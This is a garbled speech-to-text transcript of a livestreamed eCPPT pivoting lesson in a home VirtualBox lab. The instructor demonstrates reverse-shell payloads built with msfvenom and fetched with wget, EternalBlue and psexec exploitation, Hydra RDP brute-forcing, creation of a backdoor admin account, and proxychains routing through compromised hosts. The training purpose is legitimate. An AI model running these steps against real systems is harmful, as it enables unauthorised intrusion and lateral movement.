welcome back. So today we're going to be looking at pivoting, more like eCPPT style. I already did an eJPT class, but today we're actually really looking at pivoting off a machine. Okay, so we have an internal network here, right? We have quite a few machines up and running like right now. Okay, and we have an internal network. Let me show you how we set that up first. So what we have here, boom, there you go. Okay, so what we actually have here is a internal network with we have quite a few different machines running on it, right? No Active Directory yet. We're not doing anything with Active Directory. Our network, if we go up to Tools in VirtualBox and we go to Preferences, click on Network, you can then add a network. Once you add a new NAT network, it'll come up with a screen of something like this, right? It'll say like New Network, double click on it, and there you go. Now we have our network CIDR. So our internal network is going to be 10.0.0.0/24. Supports DHCP. I then create another network. I said, okay, my external is going to be 10.10.10.0/24. Supports DHCP. So now these two cannot talk to each other anymore, right? They're not in that same subnet. And then my DMZ, okay, it's going to be 10.20.20.0/24. And so he cannot talk to my external or my internal because they're on different subnets. So without a router or some of that, they're not able to just talk to each other. And if I try to ping something inside the network right now, since it is a NAT network, that won't work. So if I try to ping 10.0.0.1, that will work. I'll say that one will work. Let's try like 2, 3, 4, 5. I should be able to get to the router, but I should be able to get to anything else because it's all behind a it's all natted. 7, 8, 9, 10. Okay, so we can see that, hey, I only have a couple machines up and I'm not able to ping anything. We'll see these IP addresses come up again. Alright, so let me go ahead and clear this out and we'll start to work on this guy. So we now have our internal, external, and DMZ set up. On my Kali Linux machine, I went ahead and made this on the, if I go to network settings, this guy's running on the external. Okay, and then on the Raspberry Pi I have here, I said, hey, you're going to be like my web server type of thing, all right? And you're going to be running internal and external. So if I go into network settings, I have adapter 1 on internal, adapter 2 on external, or I can go ahead and switch those up, however you want to do it. Now to allow for both adapters to be used, okay, there is some things you do have to do in here. So the very first thing is get into root, become root or type sudo or whatever. It should be your own Ubuntu, Raspberry Pi, whatever image you have. Should be your own machine, so you should be able to get to root pretty easily. So get into root, and then from there, we're going to go ahead and we're going to do a nano etc. I believe it's network. Yep, network interfaces. And we have to add in, now if neither of these lines are added in, you have to add in both of them. So mine only had this Ethernet 1 on here for Raspberry Pi. If you are on like an Ubuntu system, it's probably just going to have Ethernet 0, and then that's it. Alright, so you'll have to add in the Ethernet 1. iFace Ethernet 1, iNet DHCP. If you're on a Raspberry Pi, it's only going to have Ethernet 1, so you have to add in Ethernet 0, or I guess Ethernet 2, whatever. But I just went with 0, and allow hot plug. And actually, this one's not even the same exact way, huh? That's good. That's why I have to say up and down sometimes. But allow hot plug Ethernet 0, iFace Ethernet 0, iNet DHCP. Okay, so there you go. That's within that's within nano network interfaces. So I have these two guys in there. Now I think on the Raspberry Pi, I think I also had to load him in here too. Okay, Raspberry Pi, you do have to do a couple more things with if you decide to use that one. I like using Raspberry Pi because I just think it's fun. After that, let's go ahead and get back into sudo su, and we're going to go ahead and do a if up Ethernet 0. Then you hit enter. Okay, if it says something like this, interface Ethernet 0 already configured. Okay, cool. if up Ethernet 1. Okay, mine are both already configured, and then you can see that by typing if config. If it's not configured, it's going to go ahead, it's going to reach out to that router, okay, and so VirtualBox, and pull back an IP address. So if I do if config, we see on Ethernet 0, my internal network, we have 10.0.0.15. Let me go and try ping 10.0.0.15. I shouldn't be able to, and I cannot, okay? And then we also have 10.10.10.10. Okay, and that's my external network, right? That's my external interface. Let me go ahead and ping 10.10.10.10, and I can go ahead and do that. So we can see that those two interfaces I mean, they know about each other. They're both on the same device, but I'm not able to go out there and actually ping that Raspberry Pi interface.
Why not?
Because it's NATed.
What does NATed mean?
NAT means network address translation, which is like it's what our internet at our house does also. Here's a little side quest. All right, so our internet at our house, right? We pay for one public IP address, but if we have stuff that has the same IP address, we get what's called IP conflict, right? So that can't happen. So the internet service provider, they can only give us one IP address. Well, how do we get our phone, my computer, your laptop, your phone, the Xboxes, the TVs, every single thing, right? Every single thing, talking out of the internet. How do we do that if they all need an IP address to talk and we only get one? They don't rotate through. That was actually an old way of doing stuff. They don't rotate through anything like that. They do what's called port address translation. So we have an internal IP addresses. We have 192.168 something dot something, which are all internal IP addresses. Everyone in the world has that. They either have 192.168 or they have a 10 network IP address. Those are internal IP addresses. So from there what happens is it then goes out to our public IP address. It puts a port on it, a randomly selected port number, goes out and grabs the information, comes back our router and says, oh, that randomly selected port number went to, Ryan's phone. So it goes to that phone on my, to that page on my phone. That's why. So we cannot ping the people next door 192.168 network. Okay? We can't ping that. It's impossible. But we can ping their public IP address. If we can then hack their public IP address, then we can get into their internal network, right? Right. Okay, so there's your side quest on what is NAT. All right. Any other questions, Audrey? Did that answer your question?
Yep.
Are you going to be able to retain that knowledge?
Nope.
Nope, okay. Can you grab me a Pepsi? Please? All right. So we can ping that Raspberry Pi, right? And then I'm going to move back and open it because rest in peace headphone users, you know what I'm saying? If you do it right next to it, it's freaking horrible. All right, so we cannot ping anything inside that internal network. So that's why I set this whole guy up. So let's start off with a quick, I have config on myself, right? And I have 10.10.10.4. That's my IP address. So let's go ahead and start up a quick mmap tac.sn 10.10.10.0/24. We know that I'm .4. We do know that it's 10.10 already that we're attacking.
What happened?
But if we do know that's 10.10 already, right, that we're attacking, but we're not going to really go into that. Like we want to be able to find it, right? We want to be able to ping it and find it.
This is a cork from a wine bottle
I'm doing
that this genius right here opened. If you can see,
no, they cannot.
It's probably the size of the
small.
tip of my freaking pinky. Yeah, corkscrew doesn't do that. What did you use?
Corkscrew.
Just drill it?
Yep.
Thinking like you drill a hole through the cork and that's how you pour it out?
Okay, so we have this IP address up and running. Right, so we have 10.10.10.10. So let's go ahead and do an mmap scan on it, just like we regularly would. Or we could also do a Nessus scan. If you want to do Nessus, you can run a Nessus scan on it. But let's go ahead and look at all ports for 10.10.10.10. If you are taking eCPPT, I would highly suggest you do a Nessus scan. You're allowed to do it. TAC-BV, hey, do not ping. Let's do a TAC-SC, TAC-SV, TAC-A, TAC-O. Okay, we're going to go really hardcore with this guy. Okay, so we're going to say aggressive scan. We're going to try to figure out what type of operating system it is, running the default scripts, running to see what versions we're running, and we're just going to go ahead and throw it at this guy up here. Right, it's 10.10.10.10. And we have port 22, 80, and 21. So let's go ahead and look at that port 80. Now, if you are preparing for eCPPT, then you know that it's more than just a get inside the network and do stuff, right? You also have to show if there's web pages that can be exploited, there's cross-site scripting, there's SQL injection. It's not just get to root. All right, there's a lot more than just that. And some of the machines you may not even get to root with. All right, so we go ahead and rerun that, right? So we get all this back. Okay. We see some support methods here. We see the HTTP server head sends back the HTTP server information. All right, and we do not know what type of operating system it is yet. We got that it is an OS Unix Linux operating system, Linux kernel. We know that. All right, and from here we get this SSH, Open SSH 7.9. That looks pretty good. And we also have anonymous login. So that would be obviously a finding anonymous login, right? Point toward the internet. So let's go ahead and do a FTP on 10.10.10.10, and we'll do anonymous. See if there's anything in here. And doesn't look like there is nothing in here, but still, that's it. That's going to be a finding because that is still dangerous, and that could be something that could be exploited down the road if they start to use the FTP server. Now, this isn't a web exploitation class. This is an eCPPT pivoting class, so that's why I didn't want to spend a bunch of time on the Raspberry Pi. I just went with, hey, if it's a Raspberry Pi, I'm gonna go with default credentials. All right. Hey, Logic. Hey, Al. What's up, man? So if I were to, I'm not going to spend a bunch of time doing that, so I'm going to go ahead and just do the default credentials. So if it's a Raspberry Pi, and I know it's a Raspberry Pi, go ahead and SSH Pi at 10.10.10.10. The default credentials are going to be Raspberry. So you guys know if you ever set up a Raspberry Pi, it's Pi and then Raspberry. So okay, we got it there. Let's go ahead and do a sudo tac L, and we can see we can run everything, right? Like I said, this is not a this is not a web exploit class. This is not a Linux exploit class. This is a pivoting class. So that seems to be the problem that people have the most with this exam, is the pivoting and understanding the network layouts. So let's go ahead and let's do a sudo su, and we are now root. Cool, we're root. But like now what, right? We can do an ARP. All right, we see that there's another network in here. We do an ifconfig. We see that, hey, yeah, we have another network in here. 10.00.15. He knows about 10.0.0.3. Who else? Who knows what else is in there? But what do we do with this information, right? Let's go ahead and let's make see if wget on here first. Which wget? We do have wget. Okay, so let's go ahead and make a wget request and pull some information back down. Let's try and do like a shell.elf file or something like that. So let's do an msfenum tacp linux Linux x64 shell reverse TCP. Alright. TACF is obviously something to do with, but TACF is going to be an elf file, right? And we'll save that out to shell.elf. And since it's elf file, we are going to do a shell reverse TCP. So a little trick for this is, okay, what do I put in? Do I need L host? Do I need the L port? Do I need the R host? What do I need? What type of information do I need here? I'm going to type in MSF console. I do attack Q so the banner will show up, even though that is the most important command is banner. Alright, so we'll go ahead and we'll do an MSF console, and we can actually look up what type of payloads we can use with Linux x64. So let's go ahead and use exploit multi-handler, set payload to Linux x64, hit tab twice. Can I even do that? Linux, yes. Yeah, x64. Okay. Shell reverse TCP. So we'll say Linux x64 shell reverse TCP. Now if I go to show options, this is the information it needs, right? Okay, it needs an L port, it needs an L host. That's it. So we'll say L host equals 10.10.10.4, right? My own IP address, correct? If I go back up here, excuse me, I have config 10.10.10.4. L port equals 4444. Okay, or whatever port you want to put in. Alright, and we'll go ahead and we'll type in use over here, or run, or set lhost to 10.10.10.4 myself, right? And we'll say run tac j. We're just going to run that in the background. Over here, we're going to go ahead and make that shell.elf file. Okay, cool. We made that shell.elf, lstack.la. We have shell.elf in here now. Now what we can do is we can go ahead and do a Python server, Python tac-m, http.server, and we'll do that on port 80. Python 3, maybe. There we go. We'll do that on port 80, and then we'll do a wget up here, http 10.10.10.4 shell.elf. And there we go. We transfer that over, lstack.la. So now on home Pi, there is now a shell.elf in here, right? And a whole bunch of other ones that I've obviously done in the past. So I'm going to remove actually all those. Alright, cool. We're going actually in the temp folder. And we'll go ahead and we'll re-upload that shell.elf file. We'll do that same command again. Shell.elf, lsec.la, and there's shell.elf. Now we have our exploit or our listener up and running over here, right? Exploit multi-handlers pretty much say that thing is netcat. Same exact concept, but now we're going to have it within Metasploit, not within netcat. So let's go ahead and do a /shell change mode +x shell.elf, and then /shell.elf, and we should get a callback over here, and we do. We get a session 1. So let's go ahead and go into session 1, ID, and I am root over here. Awesome, cool, sweet, amazing, great. Let's go ahead and search for shell 2. I can exit out of here. I can now control, we'll leave this guy up and running. Okay, search for shell 2, and we want to now change it over to shell to interpreter. Let's go ahead and use 0. Show options. Set our session to 1, and we'll hit run. Type in run, and we'll see does it actually get an interpreter session. It may not. We can fail at getting an interpreter session. We got one. Cool. So interpreter session 2. So if I go to sessions tac I now have a interpreter session 2. So we go to sessions 2. Alright, and I definitely set up an x64 payload. This is definitely x86. Whoops. Whatever. I ran it. So, alright, so we have a interpreter session now, right? And from here what we can do is we can go ahead and do a get UID. I should still be root. And I am. I'm still root. Okay, 0, 0, 0, 0 across the board, right? Let's go ahead and do an lsec.la. And I have this interpreter session up, so let's go ahead and do an Arp Scan. Is it just Arp, or... So we're finding 10.0.0.3 still, right? We do that ifconfig again, right? And we do see that, hey, we do have a 10.0.0.15. I believe I can run... Is it Arp Scan? Arp Scanner, there we go. Let's go ahead and run Arp Scanner. Can we do this? It's not supported with the script, really. This version of interpreter... Run Arp Scanner on 10.0.0.0/24. Can I do it like that? Really? Let's go ahead and see if there's a search for Arp Scan. Okay, use 0. Show options. Set session to 2. Set our host to 10.0. You know what? I still have to do more. I still have to do a lot more, actually. Yeah, but I should be able to set our host to 10.0.0.0/24. Can I run that yet? Okay, I cannot run it yet. Okay. So let's go ahead and let's start to see how are we going to pivot, right? What are we going to do to pivot? How are we going to talk to this other 10.0.0.0 network? We can get to it, but now what do we do with it, right? We can go ahead and get pretty much rid of that guy. All right, we don't really need him anymore. We can go ahead and stop this down here. I get out of here, and now what we want to do is we want to run auto route. Let's go ahead and hop back into interpreter. So sessions 2, and we're going to run auto route tac s for the subnet 10.0.0.0/24. Okay, there we go. It's good to say that it is depreciated. You can still use it. If I do an auto route tac p, we can now see that yep, 10.0.0.0 is going out of session 2. So we have now just started our proxy chain process there. Okay. Now if I go ahead and I go to Control Z, background this guy, and I go to search for socks, I can go then to socks 5, use 2, show options, set our server ports 1080, wherever we want to set that to, okay. We're going to do a sudo nano /etc ProxyChains, ProxyChains.com, I believe it is, /etc ProxyChains.com, yep, make sure dynamic change is good to go. That's not, nothing going on there. Scroll all the way down to the bottom, and just go ahead and comment out the stocks 4 one. You may have this up and running for Tor, or if you don't want to comment it, don't, but that way you'll be up and running for Tor. And then put in the stocks 5 one for 1080. Alright, so now we have stocks 5, 1080. Our server port up here is 1080. Go ahead and type in run, and he started stocks 5 proxy server. We have a proxy server down here that's up and running, right? So now we should be able to technically do is do a ProxyChains and see who the heck is 10.0.0.3. So we should be able to do ProxyChains, and we should be able to say nmap TAC V TAC, TAC VV, 10.0.0.3, TAC PN, like that. Now, I would never suggest to do a TAC V TAC for ProxyChains. Alright, this is going to take forever. I'm on my own network, so it really won't take that long, as you can see, but you can see what type of problems we're going to come up with here, right? This is a huge problem, like right here, right? That is a huge problem. So let's try to actually put in some ports here. 139, 445, 3389, let's see here, 21, 22, 23, 80, 53, 443, 80, 80. Okay? Let's try to do that. Every single one of these are closed. Huh, that sucks, doesn't it? So who the heck is 10.0.0.3? I have no idea. I have no clue who 10.0.0.3 is. If I start using these guys down here and start pinging stuff, then we'll actually get more up here. And I figured I could just do a run, the run Arp Scanner. I figured I could just do that, but I guess not. Because this version of Interpreter is not supported with this script, so I guess I can't do that. But that is okay. We could probably do more. So let's go ahead and let's see what we can actually run. Let's go ahead and run post, or run, yeah, post Linux gather. Let's try like enum network maybe. Or there's like an Arp Scanner in here. Not really looking like it. Now is there? Let's go ahead and try an enum network. So run post Linux gather enum network, right? Let's go ahead and try that. So he's going to go ahead and do that. Active connections, let's try that maybe. Listening ports, if up and down, active connections, host file, DNS firewall, route table, network config stored. We can try that guy right there. So we're just going to go ahead and cat him. Cat that one. And that just looks like an IF config like right there. And as you can see, it is 10.0.0.15, so it is the one that's over here. Let's go ahead and look at the route table. Now, if this was an actual network, the Arp Scanner would work a lot better. Like, our ARP would actually work. Because people would be using the network, you know. So this is going to be a little bit more difficult. But there are ways to work around this. Let's go ahead and Control-Z, yes. And we're going to search for port scan. And let's go ahead and use one that does a TCP. So we're going to use 5. Show options. Set our R host to 10.0.0./24. Set threads to 100. Set ports to 21, 22, 23, 3389, 443, 139, 445, 80, 80, 80. Now let's go ahead and run that and see if we find anybody. Okay. Now, during eCPPT, you will see other people. That's a given. You will see other people, things like that, because it's supposed to emulate a real network. Real network does, nobody's not doing anything. People are always doing stuff, right? But we do start to see, okay, cool, we are actually getting stuff in here, right? So his table might have just been old. So he didn't get anything else, but he did get, and it's not going to work nearly that fast also. We're directly connected. So on 2, he got 445 and 3389. That's weird. 139 is most likely open on there. It's probably just too much for it. On 5, he got 445, 3389, 139. On 6, he's got 3389, port 80, 139, 445. On 11, he's got these guys. And then on 15, which was my Raspberry Pi, is 21, 22, and 80. So this looks like a big Windows network in here, right? That's what that kind of reminds me. This looks like Windows to me, right? So let's go ahead and let's do a ProxyChains. So you can see it out here. ProxyChains mmap. TACP 139.445.3389. And we're going to do that on IP address 10.0.0.2. And as you can see, he starts to go through and he says, oh yeah, okay, yeah, we got that. Oh yeah, yeah, okay, 3389 is up, yeah, that's correct. 139, no, not up. Just 445 is. That's very strange to me. We can take a look at that guy, see what he's running, see what he's all about. But that one is strange to me. So let's go ahead and now what we want to do is we want to start to break down. Okay, who's the most likely candidate to get in, right? I think this guy, because he got that port 80, but we can't really just look at it like right away. Maybe if we get into one of these guys, then we can remote desktop in, which then we can look at that port 80 and see if that's even worth looking at. So that's something to do like right there. So let's go ahead and start to enumerate these guys, right? So we can run ProxyChains, SMB client, or ProxyChains mmap 445. Let's go ahead and actually make a little list here. Let's go ahead and nano IPs.txt, and we'll do 10.0.0.2, 10.0.0.5, because a lot of these guys have the same ports open. So are they vulnerable to 10.0.0.11? And 15 was the web server. Yes. Okay. So are a lot of them vulnerable to the same thing? So we can go ahead and do an mmap scan or ProxyChains. Get a little bigger in case you can't see it. ProxyChains mmap. Yep. TAC P445. And we're gonna do SMB vuln tac script, right? Equals SMB vuln tac star. And we're going to do that for tac.il because that's going to tell us, hey, we want to use a file, ips.txt. Now let's see what we got here. Let's see if we get anything here. So as you can see, he's going through those ips.txt list. While that's happening, we also have port 3389 up and running. Let's go ahead and try to, I don't know, maybe brute force it, or maybe even do like an enum users or something like that. Let's go ahead and do an SMB client, or ProxyChains mmap again. Mmap. TAC P445 tac script is going to be equals SMB enum tac star, because then we can try to enum stuff, right? That's going to be for tac.il for the IP addresses of ips.txt again. Let's go ahead and run that. And we do have 3389 there, so what else we can try to do is we could try to brute force it, but I don't have even a username yet. I don't have anything. So it looks like we got 1, 2 maybe that are vulnerable MS-17. So this one right here is saying that he's vulnerable. That is 10.0.0.5. Obviously, if this was the actual test, I'd be taking notes like right now. You know, that's obviously a high critical finding like right there. And then 10.0.0.11. So 10.0.0.5 and 10.0.0.11 are saying that they're both vulnerable to MS-17 tac 010. Let's go ahead and test that theory out. Okay, let's go ahead and search for MS-17. And we'll do our eternal blue, right? MS-17 tac 010. So let's go ahead and use 8. Show options. And we're going to go ahead and run this guy. Now, if you're thinking ahead, you already see a problem here. The 10.0.0.0 network can't talk to me. He can't come back to me, right? But we're using a reverse TCP connection. Well, that's now become impossible because he cannot talk back to me. He can talk back to his web server. Maybe I can bring it back to him. Maybe I can do a netcat him. Do we have netcat? Which netcat? Oh, nope. He's still running that damn L file. So can't get to him like right now. So what do I do? Right? How do I fix this? Let me go ahead and put the camera up a little bit because I'm a little bit closer today also. How do I fix this, right? We could try to run a bind. We can set the payload to a Windows x64 bind. If I spelled Windows correctly. Bind or shell bind TCP. Shell bind TCP. We try this. Okay. Show options. Let's go ahead and set our host to 10.0.0.0.5. That's the first one, right? Let's go ahead and set our L port to 1111, and we'll go ahead and run him. We do have some stuff up here also that came back. What do we have up here? We have enum shares. All right, for 10.0.0.11, got some shares. It looks like nice. Okay, so we might be able to hop into there as SMB client. Okay. He's trying over here, so we'll go ahead and let that continue to run. We do have anonymous access over here for, who is that, 10.0.0.5. Let's go ahead and test him out like right here, because it does say that we have anonymous access like right there. So let's go ahead and do a ProxyChains, SMB client, tac out. Let's make sure that actually works for 1, 2, 3, 4, 10.0.0.5. Enter, and we do. Okay, we see users. Let's go ahead and do an SMB client. 10.0.5 users. Enter. dir. Alright, and we are definitely in this guy. We have a Ryan, that's a user, like right there. We have a fail over here, so that bind did not work. We have a Ryan over here. It looks like we're actually in his actual directory. Can I CD into Ryan? I can, okay. CD into desktop. So yeah, so Ryan is definitely a user. We're in their directory. CD into files. And we get a Wireshark file. Get 001. Alright, let's go ahead and exit out of here. We get that Wireshark file. Let's go ahead and Wireshark that guy. Wireshark 001. We're still working on that other one over there. Okay, and we can see that this is some type of, so it's using SMB2. Okay. It's some type of, just trying to go out there and grab something. We see we have an authorization like right here for an Audi. Okay. Keep coming down. We see the file is /share. Okay. Huh. The other one was users, but you're not getting anything for Audi. I'll tell you that much right now. So, and then we see, okay, so they got this to-do.txt like right here. What does this say? Can I read that to-do.txt? Request file, to-do.txt. Can I look at this file? File TCP stream? Find next. Okay. Okay. I want to see if I can actually see what that file actually says. I'm sure I can. I'm sure I'm just not doing, you know. Token sign public. Actually, I don't know because cav remover enu dll. Okay, we kind of got something here, so it's not pretty. We got easy file sharing web, cav remover exe, to do.txt, cav remover. Okay, so I'm getting some stuff back into here. So we got something to do with cav remover in here, right? So we have this Audi, we have Ryan, and we have Audi, and we have a /share like right now. We also have a /users, right? So let's go ahead and, that's in 10.0.05. Let's go ahead and do a ProxyChains. Hydra. Let's try for Audi first. Tac L Audi. Tac P. User share wordless rocky.txt. And we'll try that for RDP, I guess. In the 10.0.05, we'll go ahead and we'll try Audi first. Okay. I don't want to beat that box up too much. As you see, we continue to fail over here with that bind. Huh. So now what? All right, let's go ahead and search for MS17 again. We do have this MS17 tac 010 PS exec. Try that. Let's try to go ahead and use 9. Let's see what that. So this one is show options, right? It's still defaulting to Windows Interpreter reverse TCP. Let's go ahead and set our payload to Windows Interpreter. Let's do Interpreter bind. Can I do it like that? Yep, I could. I think I can. Nope. Interpreter /bind TCP. Can we do it like that? Set payload to Windows Interpreter /bind TCP. Alright, cool. Let's go ahead and ls-la. Oh, that's what I'm looking at. I'm like, what the heck? Alright, so otherwise did that. Let's go ahead and show options. And let's set our R host to 10.0.05. Alright, let's set our out port to 111. Because that one didn't work last time, right? We're looking like we're not getting anywhere over here. Okay, so far. So, and we will set, so we had a couple of different things, right? Let's go ahead and just try it first with 10.0.05. Let's go ahead and just type in run. See if anything works. So we didn't put in any user credentials. We didn't put an SMB pass or an SMB user. We didn't put anything like that in so far, right? We're just going to try it against 10.0.05. Let's try to hop into there and see what curve we get to. Okay, exploit completed, but no session was created. Still nothing. So we also had a user of Ryan on here. I didn't see any user of Audi on here, with, at least with FTP, right? But I just have a user of Ryan on there. So let's go ahead and try Hydra Tac L Ryan. Tac P user share where there's rocky.txt. Now if this was actually eCPPT, I would let that just continue to go and I would just beat up the box. So screw it and just start up another one. But I did see a Ryan in there. We can also try it on SMB, but I noticed that SMB is kind of finicky, right? We can also try it over here too. We can also put it in an SMB file, I believe, over here. Okay, but so we get something back. We get this. Hey, Ryan's login is ABC123. Okay, let's go ahead and now put in. So that's his SMB, or that's 3389 information, right? Is that also his SMB information? Is that his? Can we run that for PS exec, right? So can we do set SMB user to Ryan, set SMB pass to ABC123. Our payload is still that bind payload. And can we run that? All right, so we still have that bind interpreter bind payload. So it's going to try coming back out to us. And system session obtained, and there we go. Get UID, and we are now NC Authority system on this box. So let's go ahead and do an ARP tech A, or an Arp Scan, whatever else, okay? And he's connected to somebody else. He has a DMZ network in there, right? But he also was showing 10.0.0.11 and 10.0.0.15. So 11 was one of the other ones that we saw, right? 11 was one of the other ones that we believe are vulnerable to MS-17. So let's go ahead and try him, I guess. So search for MS, or let's go ahead and just set SMB user to like that. Set SMB pass right there. Set our host to 10.0.0.11. Let's just go ahead and run it. See if we can get in through SMB PS exec and without any type of information. And we can. Get UID. NT Authority system. So we've now got on 2 machines, right? If I do an ARP for this guy, we see that he also knows about 10.20.20 network. He's got 10.20.28. He knows about 10.20.29. So we don't really know too much about that 10.20.20 network. Yeah, there's a lot of people in here, right? Now, who else do we have? We had quite a few IP addresses in here, right? We had 10.0.0.6. There's 5. 6 is saying, hey, I'm not vulnerable to that trash. 11's saying that he is. We already did that. We already did 5. 6, though, was that the one that was... Let's go ahead and TACP 80 139.445. Get rid of the script. Right, is 6 the one that had port 80, 10.0.0.6. Let's see that one. He was the one with port 80 up. So now what we have to do is now we have to actually get into one of these machines, right? So we know we already have a username and password. If we didn't, let's go ahead and Control Z, yes. Session 3, get UID. This is the first one I got to, right? 10.0.0.5. Let's go ahead and do a shell. DIR, or not system 32 DIR, but CD into C at users. I should be able to see Ryan. I do. CD into Ryan. DIR. And as you can see, we don't even see a audio. I believe I changed this box up after I already submitted it to try hack me. I think I deleted the user audio in here. As we can see, we have desktop, CD in desktop maybe, DIR, CD into files, and we've already seen that, right? CD back, CD back, okay. So we do have this Ryan in here, but let's go ahead and try to add in a different user. So let's do a run get GUI. Run get GUI. Okay, we hit enter. And it's going to say, hey, we need this information. So run get GUI TAC E. Even if RDPs are enabled, I still always say, hey, enable RDP. All right, because that's good. Try to be, hey, it's already enabled. You're like, all right, cool. So run get GUI TAC E. We're going to say TAC U username. We'll say vol or pawn PWNED. TAC P password is going to be password 1337. Let's try that and see if that works. It's looking like it's working, and yeah, we now have pawned as an administrator. So let's go ahead and type in ProxyChains, Remina, and this is going to be for 10.0.0.5, right? Yes, yep, that's Ryan PC. Okay, username is going to be pawned. Password is going to be password 1337. I think I just typed that correctly. No users logged in. User disconnect. Yes. Okay. We'll say yeah. It says no users logged in, but we just go ahead and disconnect. We can also get right into there and say, hey, yeah, you're good. Just say, okay, yep, sure, you're good. Okay, minimize. Ask me later. All right, exit out of here. And we have now remote desktop into their system. So we now want to look at who the heck is 10.0.0.6, what is the IP address of that, right, and everything else, right? I know it's not the biggest, I know it's not the most beautiful thing in the world, I understand that. I apologize. But let's go ahead and hop into Internet Explorer here, and we'll do 10.0.0.6. Ask me later. And we can get some type of Microsoft IIS page here. So we know that, okay, cool. This does exist. The 10.0.0.6 does exist. Now, can this guy, like right here, talk back to our Raspberry Pi? 10.0.0.15 should be able to. He's got an Apache web page. So let's start to really use that Raspberry Pi there, right? So let's go ahead and go back into Control-Z, back out of here, Session Tech I. We have our interpreter session like right here with that Raspberry Pi still up, right? So let's make a MSF Venom, TAC P, Windows, x64, because we're trying to get in that 10.0.0.6 now, but we have no way into him. Right, because it's saying that he is not vulnerable to any type of SMB attack or anything like that. So we'll say bind, or shell bind TCP, right? And like I said before, use exploit multi-handler if you can't remember. Okay, use 6, yep. Show options, set our payload to Windows x64, shell bind TCP, show options, and we can set our host and L port. Okay, so L port is going to equal 2222. Okay, our host is going to equal 10.0.0.6, right? That's going to be our host, right? And we're going to try to open up a bind port. Now, I'm going to tell you this much right now. This is not going to work. Okay, that machine has a firewall on it. It's not going to work. It's not going to happen. So, how the heck do we get in this machine now? Okay, instead of wasting your guys' time and actually typing out this whole thing, it's not going to work. He has a firewall. What if we send back, we send something up there that sends a reverse TCP connection back to our web server? Can we do that? I haven't actually tested this yet on this guy. I know that that does work. That's something that you can do. So let's do a shell reverse TCP. Okay. Let's do something like that. Now, we don't want to make an interpreter because we are going to send it back to him over here, right? So let's go ahead and do a session tech I. Session 2, whatever. Show options, or shell. Which netcat, right? Netcat tech LVMP. We'll say 2222. Okay, now he's listening. Lhost is going to equal 10.0.0.15, right? Something that he can talk to, which we know he can talk to 10.0.0.15. Lport is going to equal 2222. We'll save that. Tech F file type is going to equal executable. We'll save that as a shell.exe. Like I said, I don't know if this is actually going to work or not. But what we do have to do is I first have to okay. So what I first have to do is actually do an upload on here. So let's go ahead and upload shell.exe. Well, let's first cd into var www.html and then upload shell.exe. Right. That's now uploaded. We could also do a wget. Right. Now we can go to shell nc tech lvmp 2222. Alright. Let's go ahead and hop back in that remnant over here and say /shell / ooh, I still have to get that guy to 10.0.0.6, huh? And I don't have. How do I get that guy to 10.0.0.6 if I have no way to be able to get into him? Can I brute force? Does he have 3389 open? That's the next question. Let's try that. Does he have 3389? He does have 3389 open. Let's try to brute force that 3389 then. Hydrotech L. I guess we'll just go with Ryan again. TAC P user share wordless rocky.text RDP into 10.0.0.6 because we don't have a username, we don't have a password, we don't have anything for that guy. like right there for 10.0.0.6. So because I mean, I even if I got to him, I can't like do anything with him, you know. I can only get to that web server on port 80, which is an IIS server, right? So the only thing that I could think of is maybe trying to do some type of like go buster, like ProxyChains. Did I do a ProxyChains at the beginning of this guy? No. ProxyChains. Maybe like a ProxyChains go buster. dir tech u http 10.0.0.6. And that's going to be where this going to be user share where this comment where this there be comment.text. We'll try something like that. I don't know if ProxyChains can actually even do that, but we're going to try it. He is trying on 3389. Actually, I really don't. I don't remember if I can do this or not. Supposedly, I mean, I'm honestly logged in. So we're not getting anywhere with that so far, right? Now, I did just kind of cheat. I looked at it for like a second. I was like, oh yeah, I could try that. Let's try with Audi, because we know that Audi exists, right? We know that username exists. Or that is somebody, because remember we found Audi over in another spot before. So we know that that could exist, very well could exist. So let's try that. Because as of right now, we still can't get in at 10.0.0.6. So hopefully we find something in here. I don't actually remember. If we don't, we're just going to move on to, while that guy's actually going, we can actually do this. We can actually move on to the DMZ, alright? Let's go ahead and terminate that. Control Z, yes. So we know about the DMZ, right? So if we do a session tag I, we do a sessions, what? I think it was 3 maybe? Let's try sessions 3. We'll do an IP config. What IP? So he has a 10.20.28 IP address. And he also has a 10.0.0.5 IP address, right? So he has 2 IP addresses on here, right? Now we could have also figured out with post Windows gather enum network or whatever. We could have figured out many different ways. So we could have run post yes, multi-gather network, or maybe it might have been Windows network or whatever. Post Windows capture keylogger, get system. I mean, you can do a whole bunch of stuff within this guy, right? Credential collector, a lot of stuff that you can do inside of here, right? So pretty amazing little thing right here. But yeah, you could have also figured out the that without doing IP config. IP config is a lot easier, right? So let's go ahead and do that IP config again, and we see that yes, he does have a 10.20.20.8 and also a 10.0.0.5, right? So let's go ahead and run auto route. Tech S, and we define Audi's password. Okay, tech S 10.20.20.0/24. Now this is our second auto route, right? So if I do a run auto route tech P, we now have 2 in there, right? We have our DMZ, and we have our internal network, right? Now the problem here is that now I need to say, hey, we need more ProxyChains set up, but we can't use port 1080 anymore. Port 1080 is already going here. Port 1081 is now going to go over here. So let's go ahead and background him. We're going to do a search for SOCKS 5 again. We have our auxiliary server. Let's go ahead and use 0, show options. And we're going to set the server port this time. Set server port to 1081. Run. Now let's go run the background. As you can see, it's job 3 now. Job 2 was 1080. Alright, awesome. Hey GoPro Soldier, how you doing? So job 2 is 1080, job 3 is now 1081. So let's go ahead and do a sudo nano, or sudo cat, whatever. Yeah, sudo nano, etsy, proxychains.conf again. There we go. Right, dynamic chain still on, right? Now this is right where that other SOCKS 5 comes in. Local loopback address, right? My own address, going out to 1081 this time. SOCKS 5 was going to 1081. We set the server port 1081. Now we should be able to read. So if we do a ProxyChains tech ProxyChains tech P for an MF scan, right? If we do 139.3389.445 for 10.20.20, I believe it was 8, we should be able to get that now. If we do ProxyChains mmap, if I actually type it in correctly. ProxyChains mmap, we should be able to get there now and actually see, and as you can see, those 3 are now open. So we can actually get there now because we have these other proxies running with our routes up and running, right? So let's go in. So we did just figure out that our ProxyChains do work. Figured that out. That's great. You know, that's good news. We also figured out login for 10.0.0.6, which we're going to go ahead and we'll attack that here in a minute. Let's go ahead and see what else we can find as 10.20.20 network. So we'll start with a port scan. So search for port scan again, right? Let's go ahead and use our TCP scan again. Okay, we can kind of get rid of that guy also. So let's go ahead and use 5, show options. All right, and we can go ahead and do I set our host to the 10.20.20/24 network. Now hopefully everything goes just fine. Sometimes everything will crash when you're trying to send it through the Raspberry Pi and through a Windows machine. Sometimes everything crashes and just burns. All right, sink or burn, right? So we're looking for, so these guys, we don't really care about them too much, right? This 10.9 one, that's who we care about, okay? So 